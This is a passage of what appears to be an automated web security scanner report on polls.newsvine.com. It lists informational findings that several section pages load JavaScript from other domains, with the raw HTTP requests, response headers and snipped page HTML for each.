<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineentertainment&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.559. http://www.polls.newsvine.com/environment previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/environment

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineenvironment&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /environment HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 57793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineenvironment&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.560. http://www.polls.newsvine.com/fashion previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/fashion

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinefashion&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /fashion HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 59892

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinefashion&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.561. http://www.polls.newsvine.com/health previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/health

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinehealth&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /health HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58384

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinehealth&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.562. http://www.polls.newsvine.com/history previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/history

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinehistory&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /history HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 55628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinehistory&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.563. http://www.polls.newsvine.com/home-garden previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/home-garden

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinehomegarden&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /home-garden HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42031

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinehomegarden&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.564. http://www.polls.newsvine.com/not-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/not-news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinenotnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /not-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:18:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 39757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinenotnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.565. http://www.polls.newsvine.com/odd-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/odd-news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineoddnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /odd-news HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 58614

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvineoddnews&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.566. http://www.polls.newsvine.com/politics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.polls.newsvine.com
Path:	/politics

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvinepolitics&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET /politics HTTP/1.1
Host: www.polls.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; jt_time=1296350654008; TZM=-360; s_sq=%5B%5BB%5D%5D; vid=55d515b4f7dadf9aee6395750020b187;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=300
Date: Sun, 30 Jan 2011 03:17:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
